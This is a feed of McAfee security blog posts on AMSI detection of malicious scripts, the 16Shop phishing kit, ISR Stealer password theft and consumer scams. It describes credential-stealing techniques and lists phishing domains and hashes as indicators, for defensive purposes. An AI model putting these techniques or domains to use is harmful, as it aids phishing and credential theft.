Oliver Devane – McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Mon, 12 Aug 2019 02:25:42 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png Oliver Devane – McAfee Blogs https://securingtomorrow.mcafee.com 32 32 McAfee AMSI Integration Protects Against Malicious Scripts https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/#respond Mon, 12 Aug 2019 13:00:42 +0000 https://securingtomorrow.mcafee.com/?p=96339

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of Malware since the start of 2019. This blog will help show you how […]

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

]]>

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of Malware since the start of 2019. This blog will help show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner will scan scripts once they have been executed. This enables the scanner to de-obfuscate the script and scan it using DAT content. This is useful as the original scripts can be heavily obfuscated and are difficult to generically detect, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead it will appear in the ENS log and event viewer as show below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner

The PowerMiner malware is a cryptocurrency malware whose purpose is to infect as many machines as possible to mine Monero currency. The initial infection vector is via phishing emails which contain a batch file. Once executed, this batch file will download a malicious PowerShell script which will then begin the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams  detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool, however malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being downloaded to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (Not currently released) will use Real Protect Machine Learning to detect PowerShell AMSI generated content.

This is done by extracting features from the AMSI buffers and running these against the ML classifier to decide if the script is malicious or not. An example of this is shown below:

 

Thanks to this detection technique, MVISION EndPoint can detect Zero-Day PowerShell threats.

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION EndPoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/feed/ 0
16Shop Now Targets Amazon https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/#respond Fri, 12 Jul 2019 13:00:19 +0000 https://securingtomorrow.mcafee.com/?p=95874

Since early November 2018 McAfee Labs have observed a phishing kit, dubbed 16Shop, being used by malicious actors to target Apple account holders in the United States and Japan. Typically, the victims receive an email with a pdf file attached. An example of the message within the email is shown below, with an accompanying translation: […]

The post 16Shop Now Targets Amazon appeared first on McAfee Blogs.

]]>

Since early November 2018 McAfee Labs have observed a phishing kit, dubbed 16Shop, being used by malicious actors to target Apple account holders in the United States and Japan. Typically, the victims receive an email with a pdf file attached.

An example of the message within the email is shown below, with an accompanying translation:

When the victims click on the link in the attached pdf file, they are redirected to a phishing site where they will then be tricked in to updating their account information, which often includes credit card details.

The following is one of the many pdf files that we have seen attached to the phishing emails:

The phishing page is shown below:

 

The following image shows the information that is being phished:

The following map shows the locations where we have observed this phishing campaign:

The author of this phishing campaign used the conversion site Pdfcrowd.com to create the malicious pdf file, which was attached in the phishing emails. (The pdf tag can be seen below):

16Shop phishing kit

The phishing kit originates in Indonesia and the code handles multiple languages:

Most phishing kits will email the credit card and account details entered on the site directly to the malicious actor. The 16Shop kit does this, too, and also stores a local copy in other text files. This is a weakness in the kit because anyone visiting the site can download the clear-text files (if the attacker uses the default settings).

The kit includes a local blacklist, which blocks certain IP addresses from accessing the website. This blacklist contains lots of IPs of security companies, including McAfee. The blacklisting prevents malware researchers from accessing the phishing sites. A snippet is shown below:

While looking at the code we observed several comments that appear to be tags of the creator. (More on this later.)

The creator of 16Shop also developed a tool to generate and send the phishing emails. We managed to gain a copy and analyze it.

The preceding configuration shows how an attacker can set the subject field as well as the origin address of the email. While looking through the source files, we noticed the file list.txt. This file contains the list of email addresses that the phisher sends to. The example file uses the address riswandanoor@yahoo.com:

This email, along with the name in the comments from the phishing kit, could potentially tell us some more about the creators of the kit.

The author of 16Shop

The author of the kit goes by the alias DevilScreaM. We gathered lots of information on this actor and found that this individual was involved in the Indonesian hacking group “Indonesian Cyber Army.” Several websites were defaced by this group and tagged by DevilScreaM in 2012.

We found DevilScreaM created the site Newbie-Security.or.id, an Indonesian site of hacking tools frequented by members of the Indonesian Cyber Army. We also discovered two eBooks written by DevilScreaM; they contain advice on website hacking and penetration testing.

The timeline of DevilScreaM’s activity shows a notable change in late 2012 and the middle of 2013. DevilScreaM stopped defacing websites and created an anti-malware product, ScreaMAV, for the Indonesian market. This “white hat” activity did not last. In mid-2013 they began defacing sites again and posting exploits on 0day.today mostly around WordPress vulnerabilities.

DevilScreaM’s GitHub page contains various tools, including a PHP remote shell used on compromised websites as well as commits on the z1miner Monero (XMR) miner tool. in late 2017 DevilScreaM created the 16Shop phishing kit and set up a Facebook group to sell licenses and support. In November 2018. this private group had over 200 members. We checked the group in mid-June 2019 and it now has over 300 members and over 200 posts. Despite the questionable content, the group not only persists unchanged on social media, but continues to grow.

McAfee has notified Facebook of the existence of this group. The social network has taken an active posture in recent months of taking down groups transacting in such malicious content.

Recent News and Switch to Amazon

In May 2019, several blogs were published highlighting that a version of 16shop was cracked which included a backdoor that would send all data via telegram to the author of the kit. We can confirm that this was not present in the version we analysed in November. These leads us to believe that this backdoor was added by a second malicious actor and not the original author of 16Shop.

[Telegram Bot API command from Cracked 16shop kit to send stolen data]

In May 2019, we found a new phishing kit which was targeting Amazon account holders. Looking at the code of the kit, you can see it shows several similarities to the 16shop kit targeting Apple users back in November 2018.

 

[Fake Login page]

[PHP code of Phishing Kit and Admin page]

Around the same time that we discovered the Amazon Phishing Kit, the social media profile picture of the actors we believe are behind 16shop changed to a modified Amazon logo. This reinforces our findings that the same group is responsible for the development of the new malicious kit.

[Obfuscated Profile Pic]

We believe that victims of this kit will be led to the malicious websites via links in phishing emails.

We recommend that if users want to check any account changes on Amazon, which they received via email or other sources, that they go to Amazon.com directly and navigate from there rather than following suspicious links.

Conclusion

During our monitoring, we observed over 200 Malicious URLs serving this phishing kit which highlights its widespread use (all URLs seen have been classified as malicious by McAfee).

The group responsible for 16shop kit continues to develop and evolve the kit to target a larger audience. To protect themselves, users need to be extremely vigilant when receiving unsolicited email and messages.

This demonstrates how malicious actors use legitimate companies to leverage their attacks and gain victims’ trust and it is expected that these kinds of groups will use other companies as bait in the future.

Indicators of compromise

Domains (all blocked by McAfee WebAdvisor)

Apple Kit

  • hxxps://secure2app-accdetall1.usa.cc.servsdlay.com/?16shop
  • hxxps://gexxodaveriviedt0.com/app1esubm1tbybz/?16shop
  • hxxps://gexxodaveriviedt0.com/secur3-appleld-verlfy1/?16shop
  • hxxps://sec2-accountdetail.accsdetdetail.com/?16shop

Amazon Kit

  • verification-amazonaccess.secure.dragnet404.com/
  • verification-amazon.servicesinit-id.com/
  • verification-amazonlocked.securesystem.waktuakumaleswaecdvhb.com/
  • verification-amazonaccess.jaremaubalenxzbhcvhsd.business/
  • verification-amazon.3utilities.com/
  • verification-amaz0n.com/

McAfee detections

  • PDF/16shop! V2 DAT =9086 , V3 DAT = 3537

Hashes (SHA-256)

  • 34f33612c9f6b132430385e6dc3f8603ff897d34c780bfa5a4cf7663922252ba
  • b43c2ba4e312d36a1b7458d1342600957e0daf3d1fcd8c7324afd387772f2cc0
  • 569612bd90de1a3a5d959abb12f0ec66f3696113b386e4f0e3a9face084b032a
  • d9070e68911db893dfe3b6acc8a8995658f2796da44f14469c73fbcb91cd1f73

For more information on phishing attacks:

The post 16Shop Now Targets Amazon appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/feed/ 0
Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-apps-charging-high-fees/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-apps-charging-high-fees/#respond Wed, 13 Mar 2019 22:23:02 +0000 https://securingtomorrow.mcafee.com/?p=94598

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for […]

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

]]>

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victim to deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app off your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/android-apps-charging-high-fees/feed/ 0
Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/#respond Fri, 01 Feb 2019 14:00:22 +0000 https://securingtomorrow.mcafee.com/?p=93991

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a […]

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

]]>

Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) data by disguising themselves as the official McAfee customer support website.

So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

 

At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

  • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
  • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
  • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/mcafee-customer-support-scam/feed/ 0
Attention Red Dead Redemption 2 Players: Dodge This New Download Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/#respond Thu, 06 Dec 2018 17:00:58 +0000 https://securingtomorrow.mcafee.com/?p=92879

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a […]

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

]]>

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/red-dead-redemption-2-scam/feed/ 0
Don’t Get PWNed by Fake Gaming Currency Sites https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-gaming-currency-sites/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-gaming-currency-sites/#respond Fri, 16 Nov 2018 01:34:35 +0000 https://securingtomorrow.mcafee.com/?p=92740

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and […]

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

]]>

If you’re a gamer, you know how important virtual currency is. It allows you to purchase new costumes and weapons to personalize your avatar. But how does one go about gaining virtual currency? Players complete in-game challenges and are rewarded with coins to spend in their virtual world. These challenges can be pretty difficult and time-consuming to complete. As a result, many players look to various websites as an easier way to download more gaming currency. Unfortunately, malicious actors are taking advantage of this trend to scam gamers into downloading malware or PUPs (potentially unwanted programs).

There are a variety of techniques scammers use to trick players into utilizing their malicious sites. The first is fake chat rooms. Scammers will set up seemingly legitimate chat rooms where users can post comments or ask questions. What users don’t know is that a bot is actually answering their inquiries automatically. Scammers also ask these victims for “human interaction” by prompting them to enter their personal information via surveys to complete the currency download. What’s more – the message will show a countdown to create a sense of urgency for the user.

These scammers also use additional techniques to make their sites believable, including fake Facebook comments and “live” recent activity updates. The comments and recent activity shown are actually hard-coded into the scam site, giving the appearance that other players are receiving free gaming currency.

These tactics, along with a handful of others, encourage gamers to use the scam sites so cybercriminals can distribute their malicious PUPs or malware. So, with such deceptive sites existing around the internet, the next question is – what can players do to protect themselves from these scammers? Check out the following tips to avoid this cyberthreat:

  • Exercise caution when clicking on links. If a site for virtual currency is asking you to enter your username, password, or financial information, chances are the website is untrustworthy. Remember, when in doubt, always err on the side of caution and avoid giving your information to a site you’re not 100% sure of.
  • Put the chat room to the test. To determine if a chat site is fake, ask the same question a few times. If you notice the same response, it is likely a phony website.
  • Do a Google search of the Facebook comments. An easy way to check if the Facebook comments that appear on a site are legitimate is to copy and paste them into Google. If you see a lot of similar websites come up with the same comments in the description, this is a good indication that it is a scam site.
  • Use security software to surf the web safely. Products like McAfee WebAdvisor can help block gamers from accessing the malicious sites mentioned in this blog.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Don’t Get PWNed by Fake Gaming Currency Sites appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-gaming-currency-sites/feed/ 0
“League of Legends” YouTube Cheat Links: Nothing to “LOL” About https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/league-of-legends-youtube-cheat-links/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/league-of-legends-youtube-cheat-links/#comments Fri, 09 Nov 2018 19:27:02 +0000 https://securingtomorrow.mcafee.com/?p=92621 If you’re an avid gamer, you’ve probably come across a game that just seems impossible to complete. That’s because, thanks to the internet, it’s so simple to look for cheats to games on YouTube to help you level up. Most cheats exist in the form of software patches that execute files in order to activate […]

The post “League of Legends” YouTube Cheat Links: Nothing to “LOL” About appeared first on McAfee Blogs.

]]>
If you’re an avid gamer, you’ve probably come across a game that just seems impossible to complete. That’s because, thanks to the internet, it’s so simple to look for cheats to games on YouTube to help you level up. Most cheats exist in the form of software patches that execute files in order to activate the cheat. However, malware and PUP (short for “potentially unwanted program”) authors are using gaming cheats to trick users into downloading their malicious files in order to make a profit. And that’s exactly what YouTube channel owner “LoL Master” has been doing to “League of Legends” players.

So how exactly does this “LoL Master” trick these innocent users? The cybercriminal uploads videos to his or her YouTube channel that demonstrate how to use various cheat files, which also provide links pointing to websites that allegedly distribute cheats and stolen accounts. When players click on these links, however, they’re now exposed to cyberthreats.

When on these sites, players will be prompted to download the cheat files, but the files are actually bundled with other malicious files uploaded by wannabe cybercriminals. If users click download, PUP installers distribute the bundled files and push them onto a victim’s device. “LoL Master” makes a profit on these downloads while the victim’s device suffers from malware.

“League of Legends” players may not pick up on this scheme for a number of reasons. First, the file hosting site falsely claims that the malware analysis software VirusTotal scanned the file. Second, the site attempts to block antimalware scanners from detecting the malicious files by putting them in a password-protected zip file. If the player isn’t using antimalware software, the PUP installer will push adware or other malicious software onto the victim’s device once they unzip the file.

So, what steps can players take to avoid this malicious trick? Check out the following tips to help protect your online security:

  • Browse with caution. Although it may seem harmless to peruse YouTube comments and descriptions, malware and PUP authors use this as a vector to push their malicious downloads. Use discretion when clicking on any links included in these comments.
  • Don’t download something unless it comes from a trusted source. It is one thing to browse around YouTube comments, it is another entirely to download items from sketchy sites. Only download software from legitimate sources, and if you’re unsure if the site is trustworthy, it is best to just avoid it entirely.
  • Use security software to surf the web safely. It can be hard to identify which sites out there are malicious. Get some support by using a tool like McAfee WebAdvisor, which safeguards you from cyberthreats while you browse.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post “League of Legends” YouTube Cheat Links: Nothing to “LOL” About appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/league-of-legends-youtube-cheat-links/feed/ 2
Connected or Compromised? How to Stay Secure While Using Push Notifications https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/browser-push-notifications/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/browser-push-notifications/#respond Tue, 06 Nov 2018 19:02:17 +0000 https://securingtomorrow.mcafee.com/?p=92499 You’re probably familiar with push notifications – messages sent by app publishers that pop up on your desktop or mobile device. Browser push notifications are messages from websites that users have granted permission to serve them the latest news without having to open the actual website. While push notifications are a handy way to stay current […]

The post Connected or Compromised? How to Stay Secure While Using Push Notifications appeared first on McAfee Blogs.

]]>
You’re probably familiar with push notifications – messages sent by app publishers that pop up on your desktop or mobile device. Browser push notifications are messages from websites that users have granted permission to serve them the latest news without having to open the actual website. While push notifications are a handy way to stay current with social media and the latest news from your favorite apps, the researchers here at McAfee have observed that these notifications have some compromising features, which impact both Chrome and Firefox browsers.

It turns out there are some real cybersecurity risks involved with taking advantage of the convenience of browser push notifications. That’s because to show push notifications, website owners must utilize pop-up ads that first request permission to show notifications. Essentially, users are tricked into thinking that the request is coming from the host site instead of the pop-up. This feature is currently being exploited by adware companies, which are using it to load unwanted advertisements onto users’ screens. Often times, these ads contain offensive or inappropriate material and users can even be exposed to irritating pop-ups that could potentially lead to viruses and malware.

So, how can users enjoy the convenience of push notifications without putting themselves at risk of a cyberattack? Check out the following tips:

  • Follow Google Chrome’s instructions on how to allow or block notifications. Check out this step-by-step guide to customize which sites you receive push notifications from and which ones you don’t.
  • Customize your Firefox notification options. You can check the status of which sites you have given permission to send notifications your way and choose whether to have the browser always ask for permission, allow or block notifications.
  • Use parental controls.No one wants inappropriate ads, especially parents of young children. To prevent exposing your kids to the inappropriate adverts that could result from push notifications, implement parental controls on your desktop. This additional filtering could prevent your child from accidentally clicking on malicious content that could infect your device.
  • When in doubt, block it out. If you come across a push notification pop-up from a suspicious-looking website or unfamiliar app, click on the ‘Block’ option to stay on the safe side.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Connected or Compromised? How to Stay Secure While Using Push Notifications appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/browser-push-notifications/feed/ 0
Phishing Attacks Employ Old but Effective Password Stealer https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/#respond Thu, 21 Jul 2016 23:55:36 +0000 https://blogs.mcafee.com/?p=51314 A few months ago we received a sample from a customer that turned out to be a password stealer (PWS). One thing about this malware stood out: the subdirectory used in the access panel URL. It contained the string “***=**U=TEAM” (which we have obfuscated). Our investigations lead us to believe this may be a case of industrial […]

The post Phishing Attacks Employ Old but Effective Password Stealer appeared first on McAfee Blogs.

]]>
A few months ago we received a sample from a customer that turned out to be a password stealer (PWS). One thing about this malware stood out: the subdirectory used in the access panel URL. It contained the string “***=**U=TEAM” (which we have obfuscated). Our investigations lead us to believe this may be a case of industrial espionage.

_od001team_090316

The actors use compromised websites to host their access panels. Luckily for us they made a mistake and left the ZIP file they dropped on the compromised site.

_od003team_090316

This enabled us to see how the back-end of the panel works. The Zip file contains five files:

od004team_090316

The three files of interest are config.php, index.php, and install.php.

Config.php contains the password for the MySQL server they will set up.

od005team_090316

Install.php creates the database and sets up the panel to store the passwords stolen by the malware. We found the following snippet in the code:

od006team_090316

We did some searching and found that “Bilal Ghouri” was originally responsible for the PHP back-end of the popular PWS Hackhound Stealer, which was released in 2009.

We also found this warning at the end of the code:

od007team_090316

Surely they would have remembered to delete this file!

_od008team_090316

The most important file is index.php. This file is responsible for storing the passwords uploaded by the malware and also enables the actors to search and export the data.

od009team_090316

It is interesting that the script checks for a specific user agent, “HardCore Software For : Public.”

od010team_090316

This user agent is used by the malware when uploading the stolen data. The PHP script checks if the user agent matches the hardcoded one before allowing any data to be uploaded.

_od014team_090316

The malware in use is ISR Stealer, a modified version of Hackhound Stealer. Our findings are confirmed by the comments in the preceding PHP code.

The PWS targets the following applications:

  • Internet Explorer
  • Firefox
  • Chrome
  • Opera
  • Safari
  • Yahoo Messenger
  • MSN Messenger
  • Pidgin
  • FileZilla
  • Internet Download Manager
  • JDownloader
  • Trillian

The following screen of the original Hackhound Stealer shows options for building the malware:

od015team_090316

This screen of the ISR Stealer builder was used by the actors behind the campaign.

od017team_090319

ISR Stealer uses two executables to gather passwords stored on the machine: Mail PassView and WebBrowserPassView, both by Nirsoft. These apps gather passwords stored in mail clients and web browsers. Both of these files reside in the resources of the ISR Stealer. The panel location is also stored in the malware’s resources, in a simple encrypted form with SUB 0x02.

od020team_090320
An encrypted URL.

od021team_090320

A decrypted URL.

We did some more digging and found that the actors responsible for this malware have been active since the beginning of 2016, with the first sample spotted in the wild in January.

The following spear-phishing emails were sent to entice targets to download and execute the PWS:

 od013team_090316

od011team_090316

The actors have been busy for several weeks, although we saw no activity during the Easter holiday. After “Easter break,” we noticed that they had slightly changed the panel. It now includes the string “Powered By NEW LINE OF *** **U TEAMS VERSION 2.1.”

_od016team_090316

One compromised website had more than 10 access panels receiving stolen passwords from the PWS. We observed that some of the targets of the spear phishing are companies that deal with machinery parts. The actors used some of the following filenames:

  • (RFQ__1045667machine-oil valves).exe
  • ButterflyCheckVALVES.exe
  • BALL VALVE BIDDING.exe
  • RFQ BALL VALVE.exe
  • Ball Valves with BSPP conection.exe

These names lead us to believe that industrial espionage might be a motive of the actors.

od018team_090320

We have also noticed that they are attaching the malware with a “.z” extension. This is likely because some popular ZIP file handlers will associate this file extension with their programs and allow users to extract it. Using .z also bypasses some popular cloud email file restrictions.

od019team_090320

We contacted the website owners used by the actors and informed them of the compromise so that they could remove the panels.

Prevention

McAfee detects this threat as PWS-FCGH. We advise you block .z file extensions at the gateway level. This step will prevent other malware from using this technique in their phishing campaigns.

 

The post Phishing Attacks Employ Old but Effective Password Stealer appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/feed/ 0
Trillium Exploit Kit Update Offers ‘Security Tips’ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-exploit-kit-update-offers-security-tips/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-exploit-kit-update-offers-security-tips/#respond Thu, 02 Jun 2016 23:27:08 +0000 https://blogs.mcafee.com/?p=50100 McAfee Labs has previously blogged about the Trillium Exploit Kit Version 3.0, which is commonly used to create and distribute malware. Last week, Version 4.0 appeared on several underground forums. We have analyzed the new version of the tool and it contains new functionality. These include: PDF downloader Password generator Security tips PDF downloader The user […]

